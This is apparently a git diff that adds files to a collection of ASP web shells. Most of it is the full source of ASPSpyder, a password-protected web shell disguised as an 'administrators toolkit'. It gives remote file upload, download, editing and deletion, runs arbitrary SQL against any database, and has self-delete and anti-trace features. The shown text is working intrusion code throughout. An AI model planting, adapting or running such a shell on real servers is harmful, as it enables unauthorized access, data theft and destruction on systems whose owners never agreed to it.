+			location = dosyaPath+"?status=1&path="+drive_+"&Time="+Date();
+		}
+	</script>
+	<%
+	Response.Write "<table align=center border=1 width=150 cellpadding=0 cellspacing=0><tr bgcolor=gray><td align=center><b><font color=white>S�r�c�ler</td></tr>"
+	for each drive_ in objFSO.Drives
+		Response.Write "<tr><td>"
+		Response.write "<a href='#'onClick=""driveGo('" & drive_.DriveLetter & "');return false;""><font face=wingdings>;</font>"
+		if drive_.Drivetype=1 then Response.write "Floppy [" & drive_.DriveLetter & ":]"
+		if drive_.Drivetype=2 then Response.write "HardDisk [" & drive_.DriveLetter & ":]"
+		if drive_.Drivetype=3 then Response.write "Remote HDD [" & drive_.DriveLetter & ":]"
+		if drive_.Drivetype=4 then Response.write "CD-Rom [" & drive_.DriveLetter & ":]"
+		Response.Write "</a></td></tr>"
+	next
+	Response.Write "<tr><td>"
+	Response.write "<a href='"&dosyaPath&"?time="&time()&"'><font face=webdings>H</font> Local Path"
+	Response.Write "</a></td></tr>"
+	Response.Write "</table><br>"
+Set fc = Nothing
+Set objFSO = Nothing
+Response.End%>
\ No newline at end of file
diff --git a/xakep-shells/ASP/aspydrv.asp.txt b/xakep-shells/ASP/aspydrv.asp.txt
new file mode 100644
index 0000000..551807d
--- /dev/null
+++ b/xakep-shells/ASP/aspydrv.asp.txt
@@ -0,0 +1,828 @@
+<%
+Function BufferContent(data)
+	Dim strContent(64)
+	Dim i
+	ClearString strContent
+	For i = 1 To LenB(data)
+		AddString strContent,Chr(AscB(MidB(data,i,1)))
+	Next
+	BufferContent = fnReadString(strContent)
+End Function
+
+Sub ClearString(part)
+	Dim index
+	For index = 0 to 64
+		part(index)=""
+	Next
+End Sub
+
+Sub AddString(part,newString)
+	Dim tmp
+	Dim index
+	part(0) = part(0) & newString
+	If Len(part(0)) > 64 Then
+		index=0
+		tmp=""
+		Do
+			tmp=part(index) & tmp
+			part(index) = ""
+			index = index + 1
+		Loop until part(index) = ""
+		part(index) = tmp
+	End If
+End Sub
+
+Function fnReadString(part)
+	Dim tmp
+	Dim index
+	tmp = ""
+	For index = 0 to 64
+		If part(index) <> "" Then
+			tmp = part(index) & tmp
+		End If
+	Next
+	FnReadString = tmp
+End Function
+
+
+Class FileUploader
+	Public  Files
+	Private mcolFormElem
+	Private Sub Class_Initialize()
+		Set Files = Server.CreateObject("Scripting.Dictionary")
+		Set mcolFormElem = Server.CreateObject("Scripting.Dictionary")
+	End Sub
+
+	Private Sub Class_Terminate()
+		If IsObject(Files) Then
+			Files.RemoveAll()
+			Set Files = Nothing
+		End If
+		If IsObject(mcolFormElem) Then
+			mcolFormElem.RemoveAll()
+			Set mcolFormElem = Nothing
+		End If
+	End Sub
+
+	Public Property Get Form(sIndex)
+		Form = ""
+		If mcolFormElem.Exists(LCase(sIndex)) Then Form = mcolFormElem.Item(LCase(sIndex))
+	End Property
+
+	Public Default Sub Upload()
+		Dim biData, sInputName
+		Dim nPosBegin, nPosEnd, nPos, vDataBounds, nDataBoundPos
+		Dim nPosFile, nPosBound
+		biData = Request.BinaryRead(Request.TotalBytes)
+		nPosBegin = 1
+		nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(13)))
+		If (nPosEnd-nPosBegin) <= 0 Then Exit Sub
+		vDataBounds = MidB(biData, nPosBegin, nPosEnd-nPosBegin)
+		nDataBoundPos = InstrB(1, biData, vDataBounds)
+		Do Until nDataBoundPos = InstrB(biData, vDataBounds & CByteString("--"))
+			nPos = InstrB(nDataBoundPos, biData, CByteString("Content-Disposition"))
+			nPos = InstrB(nPos, biData, CByteString("name="))
+			nPosBegin = nPos + 6
+			nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(34)))
+			sInputName = CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin))
+			nPosFile = InstrB(nDataBoundPos, biData, CByteString("filename="))
+			nPosBound = InstrB(nPosEnd, biData, vDataBounds)
+			If nPosFile <> 0 And  nPosFile < nPosBound Then
+				Dim oUploadFile, sFileName
+				Set oUploadFile = New UploadedFile
+				nPosBegin = nPosFile + 10
+				nPosEnd =  InstrB(nPosBegin, biData, CByteString(Chr(34)))
+				sFileName = CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin))
+				oUploadFile.FileName = Right(sFileName, Len(sFileName)-InStrRev(sFileName, "\"))
+				nPos = InstrB(nPosEnd, biData, CByteString("Content-Type:"))
+				nPosBegin = nPos + 14
+				nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(13)))
+				oUploadFile.ContentType = CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin))
+				nPosBegin = nPosEnd+4
+				nPosEnd = InstrB(nPosBegin, biData, vDataBounds) - 2
+				oUploadFile.FileData = MidB(biData, nPosBegin, nPosEnd-nPosBegin)
+				If oUploadFile.FileSize > 0 Then Files.Add LCase(sInputName), oUploadFile
+			Else
+				nPos = InstrB(nPos, biData, CByteString(Chr(13)))
+				nPosBegin = nPos + 4
+				nPosEnd = InstrB(nPosBegin, biData, vDataBounds) - 2
+				If Not mcolFormElem.Exists(LCase(sInputName)) Then mcolFormElem.Add LCase(sInputName), CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin))
+			End If
+			nDataBoundPos = InstrB(nDataBoundPos + LenB(vDataBounds), biData, vDataBounds)
+		Loop
+	End Sub
+
+	'String to byte string conversion
+	Private Function CByteString(sString)
+		Dim nIndex
+		For nIndex = 1 to Len(sString)
+		   CByteString = CByteString & ChrB(AscB(Mid(sString,nIndex,1)))
+		Next
+	End Function
+
+	'Byte string to string conversion
+	Private Function CWideString(bsString)
+		Dim nIndex
+		CWideString =""
+		For nIndex = 1 to LenB(bsString)
+		   CWideString = CWideString & Chr(AscB(MidB(bsString,nIndex,1))) 
+		Next
+	End Function
+End Class
+
+
+Class UploadedFile
+	Public ContentType
+	Public FileName
+	Public FileData
+	Public Property Get FileSize()
+		FileSize = LenB(FileData)
+	End Property
+
+	Public Sub SaveToDisk(sPath)
+		Dim oFS, oFile
+		Dim nIndex
+		If sPath = "" Or FileName = "" Then Exit Sub
+		If Mid(sPath, Len(sPath)) <> "\" Then sPath = sPath & "\"
+		Set oFS = Server.CreateObject("Scripting.FileSystemObject")
+		If Not oFS.FolderExists(sPath) Then Exit Sub
+		Set oFile = oFS.CreateTextFile(sPath & FileName, True)
+		' output mechanism modified for buffering
+		oFile.Write BufferContent(FileData)
+		oFile.Close
+	End Sub
+
+	Public Sub SaveToDatabase(ByRef oField)
+		If LenB(FileData) = 0 Then Exit Sub
+		If IsObject(oField) Then
+			oField.AppendChunk FileData
+		End If
+	End Sub
+End Class
+
+' Create the FileUploader
+IF REQUEST.QueryString("upload")="@" THEN
+Dim Uploader, File
+Set Uploader = New FileUploader
+
+' This starts the upload process
+Uploader.Upload()
+
+%>
+<html><title>ASPYDrvsInfo</title>
+<style>
+<!--
+A:link {font-style: text-decoration: none; color: #c8c8c8}
+A:visited {font-style: text-decoration: none; color: #777777}
+A:active {font-style: text-decoration: none; color: #ff8300}
+A:hover {font-style: text-decoration: cursor: hand; color: #ff8300}
+*		{scrollbar-base-color:#777777;
+scrollbar-track-color:#777777;scrollbar-darkshadow-color:#777777;scrollbar-face-color:#505050;
+scrollbar-arrow-color:#ff8300;scrollbar-shadow-color:#303030;scrollbar-highlight-color:#303030;}
+input,select,table {font-family:verdana,arial;font-size:11px;text-decoration:none;border:1px solid #000000;}
+//-->
+</style>
+<body bgcolor=black text=white>
+<BR><BR><BR>
+<center><table bgcolor="#505050" cellpadding=4>
+<tr><td><Font face=arial size=-1>File upload Information:</font>
+</td></tr><tr><td bgcolor=black ><table>
+<%
+
+' Check if any files were uploaded
+If Uploader.Files.Count = 0 Then
+	Response.Write "File(s) not uploaded."
+Else
+	' Loop through the uploaded files
+	For Each File In Uploader.Files.Items
+		File.SaveToDisk Request.QueryString("txtpath")
+		Response.Write "<TR><TD>&nbsp;</TD></TR><tr><td><font color=gray>File Uploaded: </font></td><td>" & File.FileName & "</td></tr>"
+		Response.Write "<tr><td><font color=gray>Size: </font></td><td>" & Int(File.FileSize/1024)+1 & " kb</td></tr>"
+		Response.Write "<tr><td><font color=gray>Type: </font></td><td>" & File.ContentType & "</td></tr>"
+	Next
+End If
+%>
+<TR><TD>&nbsp;</TD></TR></table>
+</td></tr></table><BR><a href="<%=Request.Servervariables("SCRIPT_NAME")%>?txtpath=<%=Request.QueryString("txtpath")%>"><font face="webdings" title=" BACK " size=+2 >7</font></a></center>
+<%
+response.End() '---- XXX
+END IF
+'--------
+ON ERROR RESUME NEXT
+Response.Buffer = True
+password = "lol" ' <---Your password here
+
+If request.querystring("logoff")="@" then
+	session("shagman")=""	' Logged off
+	session("dbcon")=""		' Database Connection
+	session("txtpath")=""	' any pathinfo
+end if
+
+	If (session("shagman")<>password) and Request.form("code")="" Then
+		%>
+<body bgcolor=black><center><BR><BR><BR><BR><FONT face=arial size=-2 color=#ff8300>ADMINSTRATORS TOOLKIT</FONT><BR><BR><BR>
+<table><tr><td>
+<FORM method="post" action="<%=Request.Servervariables("SCRIPT_NAME")%>" >
+<table bgcolor=#505050 width="20%" cellpadding=20 ><tr><td bgcolor=#303030 align=center >
+<INPUT type=password name=code ></td><td><INPUT name=submit type=submit value=" Access ">
+</td></tr></table>
+</td></tr><tr><td align=right>
+<font color=white size=-2 face=arial >ASPSpyder Apr2003</font></td></tr>
+</td></tr></table></FORM>
+<%If request.querystring("logoff")="@" then%>
+<font color=gray size=-2 face=arial title="To avoid anyone from seeing what you were doing by using the browser back button."><span style='cursor: hand;' OnClick=window.close(this);>CLOSE THIS WINDOW</font>
+<%end if%>
+<center>
+		<%
+		Response.END
+	End If
+	If Request.form("code") = password or session("shagman") = password Then
+		session("shagman") = password
+	Else
+		Response.Write "<BR><B><P align=center><font color=red ><b>ACCESS DENIED</B></font><BR><font color=Gray >Copyright 2003 Vela iNC.</font></p>"
+		Response.END
+	End If
+
+server.scriptTimeout=180
+set fso = Server.CreateObject("Scripting.FileSystemObject")
+mapPath = Server.mappath(Request.Servervariables("SCRIPT_NAME"))
+mapPathLen = len(mapPath)
+
+if session(myScriptName) = "" then
+	for x = mapPathLen to 0 step -1
+	myScriptName = mid(mapPath,x)
+	if instr(1,myScriptName,"\")>0 then
+		myScriptName = mid(mapPath,x+1)
+		x=0
+		session(myScriptName) = myScriptName
+	end if
+	next
+Else
+	myScriptName = session(myScriptName)
+end if
+
+
+wwwRoot = left(mapPath, mapPathLen - len(myScriptName))
+Target = "D:\hshome\masterhr\masterhr.com\"  ' ---Directory to which files will be DUMPED Too and From
+
+	if len(Request.querystring("txtpath"))=3 then
+		pathname = left(Request.querystring("txtpath"),2) & "\" & Request.form("Fname")
+	else
+		pathname = Request.querystring("txtpath") & "\" & Request.form("Fname")
+	end if
+
+	If Request.Form("txtpath") = "" Then
+	MyPath = Request.QueryString("txtpath")
+	Else
+	MyPath = Request.Form("txtpath")
+	End If
+
+' ---Path correction routine
+	If len(MyPath)=1 then MyPath=MyPath & ":\"
+	If len(MyPath)=2 then MyPath=MyPath & "\"
+	If MyPath = "" Then MyPath = wwwRoot
+	If not fso.FolderExists(MyPath) then
+	Response.Write "<font face=arial size=+2>Non-existing path specified.<BR>Please use browser back button to continue !"
+	Response.end
+	end if
+
+	set folder = fso.GetFolder(MyPath)
+
+if fso.GetFolder(Target) = false then
+	Response.Write "<font face=arial size=-2 color=red>Please create your target directory for copying files as it does not exist. </font><font face=arial size=-1 color=red>" & Target & "<BR></font>"
+else
+	set fileCopy = fso.GetFolder(Target)
+end if
+
+
+	If Not(folder.IsRootFolder) Then
+		If len(folder.ParentFolder)>3 then
+			showPath = folder.ParentFolder & "\" & folder.name
+		Else
+			showPath = folder.ParentFolder & folder.name
+		End If
+	Else
+		showPath = left(MyPath,2)
+	End If
+
+MyPath=showPath
+showPath=MyPath & "\"
+' ---Path correction routine-DONE
+
+set drv=fso.GetDrive(left(MyPath,2))
+
+if Request.Form("cmd")="Download" then
+ if Request.Form("Fname")<>"" then
+	Response.Buffer = True
+	Response.Clear
+	strFileName = Request.QueryString("txtpath") & "\" & Request.Form("Fname")
+	Set Sys = Server.CreateObject( "Scripting.FileSystemObject" )
+	Set Bin = Sys.OpenTextFile( strFileName, 1, False )
+	Call Response.AddHeader( "Content-Disposition", "attachment; filename=" & Request.Form("Fname") )
+	Response.ContentType = "application/octet-stream"
+	While Not Bin.AtEndOfStream
+		Response.BinaryWrite( ChrB( Asc( Bin.Read( 1 ) ) ) )
+	Wend
+	Bin.Close : Set Bin = Nothing
+	Set Sys = Nothing
+ Else
+ 	err.number=500
+	err.description="Nothing selected for download..."
+ End if
+End if
+%>
+<html>
+<style>
+<!--
+A:link {font-style: text-decoration: none; color: #c8c8c8}
+A:visited {font-style: text-decoration: none; color: #777777}
+A:active {font-style: text-decoration: none; color: #ff8300}
+A:hover {font-style: text-decoration: cursor: hand; color: #ff8300}
+*		{scrollbar-base-color:#777777;
+scrollbar-track-color:#777777;scrollbar-darkshadow-color:#777777;scrollbar-face-color:#505050;
+scrollbar-arrow-color:#ff8300;scrollbar-shadow-color:#303030;scrollbar-highlight-color:#303030;}
+input,select,table {font-family:verdana,arial;font-size:11px;text-decoration:none;border:1px solid #000000;}
+//-->
+</style>
+<%
+'QUERY ANALYSER -- START
+if request.QueryString("qa")="@" then
+'-------------
+sub getTable(mySQL)
+		if mySQL="" then
+			exit sub
+		end if
+	on error resume next
+	Response.Buffer = True
+    	Dim myDBConnection, rs, myHtml,myConnectionString, myFields,myTitle,myFlag
+		myConnectionString=session("dbCon")
+    	Set myDBConnection = Server.CreateObject("ADODB.Connection")
+    	myDBConnection.Open myConnectionString
+		myFlag = False
+		myFlag = errChk()
+        	set rs = Server.CreateObject("ADODB.Recordset")
+			rs.cursorlocation = 3
+	    	rs.open mySQL, myDBConnection
+			myFlag = errChk()
+
+	if RS.properties("Asynchronous Rowset Processing") = 16 then
+        	For i = 0 To rs.Fields.Count - 1
+    			myFields = myFields & "<TD><font color=#eeeeee size=2 face=""Verdana, Arial, Helvetica, sans-serif"">" & rs.Fields(i).Name & "</font></TD>"
+    		Next
+			myTitle = "<font color=gray size=6 face=webdings>?</font><font color=#ff8300 size=2 face=""Verdana, Arial, Helvetica, sans-serif"">Query results :</font>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<font color=gray><TT>(" & rs.RecordCount & " row(s) affected)</TT><br>"
+		rs.MoveFirst
+		rs.PageSize=mNR
+		if int(rs.RecordCount/mNR) < mPage then mPage=1
+        rs.AbsolutePage = mPage
+		Response.Write myTitle & "</td><td>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;"
+if mPage=1 Then Response.Write("<input type=button name=btnPagePrev value=""  <<  "" DISABLED>") else Response.Write("<input type=button name=btnPagePrev value=""  <<  "">")
+Response.Write "<select name=cmbPageSelect>"
+For x = 1 to rs.PageCount
+	if x=mPage Then Response.Write("<option value=" & x & " SELECTED>" & x & "</option>") else Response.Write("<option value=" & x & ">" & x & "</option>")
+Next
+Response.Write "</select><input type=hidden name=mPage value=" & mPage & ">"
+if mPage = rs.PageCount Then Response.Write("<input type=button name=btnPageNext value=""  >>  "" DISABLED>") else Response.Write("<input type=button name=btnPageNext value=""  >>  "">")
+Response.Write "&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<font color=gray>Displaying <input type=text size=" & Len(mNR) & " name=txtNoRecords value=" & mNR & "> records at a time.</font>"
+		response.Write "</td><TABLE border=0 bgcolor=#999999 cellpadding=2><TR align=center valign=middle bgcolor=#777777>" & myFields
+
+        For x = 1 to rs.PageSize
+          If Not rs.EOF Then
+			response.Write "<TR>"
+			For i = 0 to rs.Fields.Count - 1
+				response.Write "<TD bgcolor=#dddddd>" & server.HTMLEncode(rs(i)) & "</TD>"
+			Next
+			response.Write "</TR>"
+			response.Flush()
+			rs.MoveNext
+		  Else
+		  	x=rs.PageSize
+		  End If
+		Next
+		response.Write "</Table>"
+		myFlag = errChk()
+
+	else
+		if not myFlag then
+			myTitle = "<font color=#55ff55 size=6 face=webdings>i</font><font color=#ff8300 size=2 face=""Verdana, Arial, Helvetica, sans-serif"">Query results :</font>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<font color=gray><TT>(The command(s) completed successfully.)</TT><br>"
+			response.Write myTitle
+		end if
+	end if
+		set myDBConnection = nothing
+		set rs2 = nothing
+		set rs = nothing
+    
+End sub
+
+sub getXML(mySQL)
+		if mySQL="" then
+			exit sub
+		end if
+	on error resume next
+	Response.Buffer = True
+    	Dim myDBConnection, rs, myHtml,myConnectionString, myFields,myTitle,myFlag
+		myConnectionString=session("dbCon")
+    	Set myDBConnection = Server.CreateObject("ADODB.Connection")
+    	myDBConnection.Open myConnectionString
+		myFlag = False
+		myFlag = errChk()
+        	set rs = Server.CreateObject("ADODB.Recordset")
+			rs.cursorlocation = 3
+	    	rs.open mySQL, myDBConnection
+			myFlag = errChk()
+	if RS.properties("Asynchronous Rowset Processing") = 16 then
+		Response.Write "<font color=#55ff55 size=4 face=webdings>i</font><font color=#cccccc> Copy paste this code and save as '.xml '</font></td></tr><tr><td>"
+		Response.Write "<textarea cols=75 name=txtXML rows=15>"
+		rs.MoveFirst
+		response.Write vbcrlf & "<?xml version=""1.0"" ?>"
+		response.Write vbcrlf & "<TableXML>"
+		Do While Not rs.EOF
+			response.Write vbcrlf & "<Column>"
+			For i = 0 to rs.Fields.Count - 1
+				response.Write  vbcrlf & "<" & rs.Fields(i).Name & ">"  & rs(i) & "</" & rs.Fields(i).Name & ">" & vbcrlf
+				response.Flush()
+			Next
+			response.Write "</Column>"
+		rs.MoveNext
+		Loop
+		response.Write "</TableXML>"
+		response.Write "</textarea>"	
+		myFlag = errChk()
+
+	else
+		if not myFlag then
+			myTitle = "<font color=#55ff55 size=6 face=webdings>i</font><font color=#ff8300 size=2 face=""Verdana, Arial, Helvetica, sans-serif"">Query results :</font>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<font color=gray><TT>(The command(s) completed successfully.)</TT><br>"
+			response.Write myTitle
+		end if
+	end if
+End sub
+
+Function errChk()
+	if err.Number <> 0 and err.Number <> 13 then
+		dim myText
+		myText = "<font color=#ff8300 size=4 face=webdings>x</font><font color=red size=2 face=""Verdana, Arial, Helvetica, sans-serif""> " & err.Description & "</font><BR>"
+		response.Write myText
+		err.Number = 0
+		errChk = True
+	end if
+end Function
+
+    Dim myQuery,mPage,mNR
+	myQuery = request.Form("txtSQL")
+	if request.form("txtCon") <> "" then session("dbcon") = request.form("txtCon")
+	if request.QueryString("txtpath") then session("txtpath")=request.QueryString("txtpath")
+	mPage=cint(request.Form("mPage"))
+	if mPage<1 then mPage=1
+	mNR=cint(request.Form("txtNoRecords"))
+	if mNR<1 then mNR=30
+%>
+<html><title>ASPyQAnalyser</title>
+<script language="VbScript">
+sub cmdSubmit_onclick
+	if Document.frmSQL.txtSQL.value = "" then
+		Document.frmSQL.txtSQL.value = "SELECT * FROM " & vbcrlf & "WHERE " & vbcrlf & "ORDER BY "
+		exit sub
+	end if
+	Document.frmSQL.Submit
+end sub
+sub cmdTables_onclick
+	Document.frmSQL.txtSQL.value = "select name as 'TablesListed' from sysobjects where xtype='U' order by name"
+	Document.frmSQL.Submit
+end sub
+sub cmdColumns_onclick
+	strTable =InputBox("Return Columns for which Table?","Table Name...")
+	strTable = Trim(strTable)
+	if len(strTable) > 0 Then
+		SQL = "select name As 'ColumnName',xusertype As 'DataType',length as Length from syscolumns where id=(select id from sysobjects where xtype='U' and name='" & strTable & "') order by name"
+		Document.frmSQL.txtSQL.value = SQL
+		Document.frmSQL.Submit	
+	End if
+end sub
+sub cmdClear_onclick
+	Document.frmSQL.txtSQL.value = ""
+end sub
+sub cmdBack_onclick
+	Document.Location = "<%=Request.Servervariables("SCRIPT_NAME")%>?txtpath=<%=session("txtpath")%>"
+end sub
+Sub btnPagePrev_OnClick
+	Document.frmSQL.mPage.value = Document.frmSQL.mPage.value - 1
+	Document.frmSQL.Submit
+end sub
+Sub btnPageNext_OnClick
+	Document.frmSQL.mPage.value = Document.frmSQL.mPage.value + 1
+	Document.frmSQL.Submit
+end sub
+Sub cmbPageSelect_onchange
+	Document.frmSQL.mPage.value = (Document.frmSQL.cmbPageSelect.selectedIndex + 1)
+	Document.frmSQL.Submit
+End Sub
+Sub txtNoRecords_onclick
+	Document.frmSQL.cmbPageSelect.selectedIndex = 0
+	Document.frmSQL.mPage.value = 1
+End Sub
+</script>
+<style>
+	TR {font-family: sans-serif;}
+</style>
+<body bgcolor=black>
+<form name=frmSQL action="<%=Request.Servervariables("SCRIPT_NAME")%>?qa=@" method=Post>
+<table border="0"><tr>
+      <td align=right><font color=#ff8300 size="4" face="webdings">@ </font><font color="#CCCCCC" size="1" face="Verdana, Arial, Helvetica, sans-serif">Paste 
+        your connection string here : </font><font color="#CCCCCC"> 
+        <input name=txtCon type="text" size="60" value="<%=session("dbcon")%>">
+        </font><BR>
+        <textarea cols=75 name=txtSQL rows=4 wrap=PHYSICAL><%=myQuery%></textarea><BR>
+        <input name=cmdSubmit type=button value=Submit><input name=cmdTables type=button value=Tables><input name=cmdColumns type=button value=Columns><input name="reset" type=reset value=Reset><input name=cmdClear type=button value=Clear><input name=cmdBack type=button value="Return"><input type="Checkbox" name="chkXML" <%IF Request.Form("chkXML")= "on" tHEN Response.Write " checked " %>><font color="#CCCCCC" size="1" face="Verdana, Arial, Helvetica, sans-serif">GenerateXML</FONT>
+    </td>
+	<td>XXXXXX</td><td>
+	<center><B>ASP</b><font color=#ff8300 face=webdings size=6 >!</font><B><font color=Gray >Spyder</font> Apr2003</B><BR><font color=black size=-2><TT>by ~sir_shagalot</TT></font></center>
+	</td></tr></table>
+<table><tr><td><%If Request.Form("chkXML") = "on"  Then getXML(myQuery) Else getTable(myQuery) %></td></tr></table></form>
+<HR><P align=right><font color=#ff8300><TT>Copyright 2003 Vela iNC.</B></font><BR><font size=-1 color=gray>Cheers to <a href="mailto:hAshish@shagzzz.cjb.net">hAshish</a> for all the help!</font></p><BR>
+</body>
+</html>
+<%
+		set myDBConnection = nothing
+		set rs2 = nothing
+		set rs = nothing
+'-------------
+response.End()
+end if
+'QUERY ANALYSER -- STOP
+%>
+<title><%=MyPath%></title>
+</head>
+<body bgcolor=black text=white topAprgin="0">
+<!-- Copyright Vela iNC. Apr2003 [www.shagzzz.cjb.net] Coded by ~sir_shagalot -->
+<%
+		Response.Flush
+'Code Optimisation START
+select case request.form("cmd")
+	case ""
+		If request.form("dirStuff")<>"" then
+			Response.write "<font face=arial size=-2>You need to click [Create] or [Delete] for folder operations to be</font>"
+		Else
+			Response.Write "<font face=webdings size=+3 color=#ff8300>&#1570;</font>"
+		End If
+	case "   Copy   "
+	' ---Copy From Folder routine Start
+		If Request.Form("Fname")="" then
+		Response.Write "<font face=arial size=-2 color=#ff8300>Copying: " & Request.QueryString("txtpath") & "\???</font><BR>"
+			err.number=424
+		Else
+			Response.Write "<font face=arial size=-2 color=#ff8300>Copying: " & Request.QueryString("txtpath") & "\" & Request.Form("Fname") & "</font><BR>"
+			fso.CopyFile Request.QueryString("txtpath") & "\" & Request.Form("Fname"),Target & Request.Form("Fname")
+			Response.Flush
+		End If
+	' ---Copy From Folder routine Stop
+	case "  Copy "
+	' ---Copy Too Folder routine Start
+		If Request.Form("ToCopy")<>"" and Request.Form("ToCopy") <> "------------------------------" Then
+			Response.Write "<font face=arial size=-2 color=#ff8300>Copying: " & Request.Form("txtpath") & "\" & Request.Form("ToCopy") & "</font><BR>"
+			Response.Flush
+			fso.CopyFile Target & Request.Form("ToCopy"), Request.Form("txtpath") & "\" & Request.Form("ToCopy")
+		Else
+		Response.Write "<font face=arial size=-2 color=#ff8300>Copying: " & Request.Form("txtpath") & "\???</font><BR>"
+			err.number=424
+		End If
+	' ---Copy Too Folder routine Stop
+	case "Delete"		'two of this
+	if request.form("todelete")<>"" then
+	' ---File Delete start
+		If (Request.Form("ToDelete")) = myScriptName then'(Right(Request.Servervariables("SCRIPT_NAME"),len(Request.Servervariables("SCRIPT_NAME"))-1)) Then
+		Response.Write "<center><font face=arial size=-2 color=#ff8300><BR><BR><HR>SELFDESTRUCT INITIATED...<BR>"
+			Response.Flush
+			fso.DeleteFile Request.Form("txtpath") & "\" & Request.Form("ToDelete")
+				%>+++DONE+++</font><BR><HR>
+				<font color=gray size=-2 face=arial title="To avoid anyone from seeing what you were doing by using the browser back button."><span style='cursor: hand;' OnClick=window.close(this);>CLOSE THIS WINDOW</font>
+			<%Response.End
+		End If
+		If Request.Form("ToDelete") <> "" and Request.Form("ToDelete") <> "------------------------------" Then
+			Response.Write "<font face=arial size=-2 color=#ff8300>Deleting: " & Request.Form("txtpath") & "\" & Request.Form("ToDelete") & "</font><BR>"
+			Response.Flush
+			fso.DeleteFile Request.Form("txtpath") & "\" & Request.Form("ToDelete")
+		Else
+			Response.Write "<font face=arial size=-2 color=#ff8300>Deleting: " & Request.Form("txtpath") & "\???</font><BR>"
+			err.number=424
+		End If
+	' ---File Delete stop
+		Else If request.form("dirStuff")<>"" then
+			Response.Write "<font face=arial size=-2 color=#ff8300>Deleting folder...</font><BR>"
+			fso.DeleteFolder MyPath & "\" & request.form("DirName")
+		end if
+	End If
+
+	case "Edit/Create"
+%>
+<center><BR><table bgcolor="#505050" cellpadding="8"><tr>
+    <td bgcolor="#000000" valign="bottom">
+	<Font face=arial SIZE=-2 color=#ff8300>NOTE: The following edit box maynot display special characters from files. Therefore the contents displayed maynot be considered correct or accurate.</font>
+	</td></tr><tr><td><TT>Path=> <%=pathname%><BR><BR>
+<%
+ 		' fetch file information 
+		Set f = fso.GetFile(pathname) 
+%>
+file Type: <%=f.Type%><BR>
+file Size: <%=FormatNumber(f.size,0)%> bytes<BR>
+file Created: <%=FormatDateTime(f.datecreated,1)%>&nbsp;<%=FormatDateTime(f.datecreated,3)%><BR>
+last Modified: <%=FormatDateTime(f.datelastmodified,1)%>&nbsp;<%=FormatDateTime(f.datelastmodified,3)%><BR>
+last Accessed: <%=FormatDateTime(f.datelastaccessed,1)%>&nbsp;<%=FormatDateTime(f.datelastaccessed,3)%><BR>
+file Attributes: <%=f.attributes%><BR>
+<%
+	Set f = Nothing
+	response.write "<center><FORM action=""" & Request.Servervariables("SCRIPT_NAME") & "?txtpath=" & MyPath & """ METHOD=""POST"">"
+		'read the file
+		Set f = fso.OpenTextFile(pathname)
+		If NOT f.AtEndOfStream Then fstr = f.readall
+		f.Close
+		Set f = Nothing
+		Set fso = Nothing
+		response.write "<TABLE><TR><TD>" & VBCRLF
+		response.write "<FONT TITLE=""Use this text area to view or change the contents of this document. Click [Save As] to store the updated contents to the web server."" FACE=arial SIZE=1 ><B>DOCUMENT CONTENTS</B></FONT><BR>" & VBCRLF
+		response.write "<TEXTAREA NAME=FILEDATA ROWS=16 COLS=85 WRAP=OFF>" & Server.HTMLEncode(fstr) & "</TEXTAREA>" & VBCRLF
+		response.write "</TD></TR></TABLE>" & VBCRLF
+%>
+<BR><center><TT>LOCATION <INPUT TYPE="TEXT" SIZE=48 MAXLENGTH=255 NAME="PATHNAME" VALUE="<%=pathname%>">
+<INPUT TYPE="SUBMIT" NAME=cmd VALUE="Save As" TITLE="This write to the file specifed and overwrite it without warning.">
+<INPUT TYPE="SUBMIT" NAME="POSTACTION" VALUE="Cancel" TITLE="If you recieve an error while saving, then most likely you do not have write access OR the file attributes are set to readonly !!">
+</FORM></td></tr></table><BR>
+<%
+response.end
+
+	case "Create"
+		Response.Write "<font face=arial size=-2 color=#ff8300>Creating folder...</font><BR>"
+		fso.CreateFolder MyPath & "\" & request.form("DirName")
+
+	case "Save As"
+		Response.Write "<font face=arial size=-2 color=#ff8300>Saving file...</font><BR>"
+		Set f = fso.CreateTextFile(Request.Form("pathname"))
+		f.write Request.Form("FILEDATA")
+		f.close
+end select
+'Code Optimisation STOP
+' ---DRIVES start here
+	If request.querystring("getDRVs")="@" then
+%>
+<BR><BR><BR><center><table bgcolor="#505050" cellpadding=4>
+<tr><td><Font face=arial size=-1>Available Drive Information:</font>
+</td></tr><tr><td bgcolor=black >
+<table><tr><td><tt>Drive</td><td><tt>Type</td><td><tt>Path</td><td><tt>ShareName</td><td><tt>Size[MB]</td><td><tt>ReadyToUse</td><td><tt>VolumeLabel</td><td></tr>
+<%For Each thingy in fso.Drives%>
+<tr><td><tt>
+<%=thingy.DriveLetter%> </td><td><tt> <%=thingy.DriveType%> </td><td><tt> <%=thingy.Path%> </td><td><tt> <%=thingy.ShareName%> </td><td><tt> <%=((thingy.TotalSize)/1024000)%> </td><td><tt> <%=thingy.IsReady%> </td><td><tt> <%=thingy.VolumeName%>
+<%Next%>
+</td></tr></table>
+</td></tr></table><BR><a href="<%=Request.Servervariables("SCRIPT_NAME")%>?txtpath=<%=MyPath%>"><font face="webdings" title=" BACK " size=+2 >7</font></a></center>
+<%
+	Response.end
+	end if
+' ---DRIVES stop here
+%>
+<HEAD>
+<SCRIPT Language="VBScript">
+sub getit(thestuff)
+if right("<%=showPath%>",1) <> "\" Then
+   document.myform.txtpath.value = "<%=showPath%>" & "\" & thestuff
+Else
+   document.myform.txtpath.value = "<%=showPath%>" & thestuff
+End If
+document.myform.submit()
+End sub
+</SCRIPT>
+</HEAD>
+<%	
+'---Report errors
+select case err.number
+	case "0"
+	response.write "<font face=webdings color=#55ff55>i</font> <font face=arial size=-2>Successfull..</font>"
+
+	case "58"
+	response.write "<font face=arial size=-1 color=red>Folder already exists OR no folder name specified...</font>"
+
+	case "70"
+	response.write "<font face=arial size=-1 color=red>Permission Denied, folder/file is readonly or contains such files...</font>"
+
+	case "76"
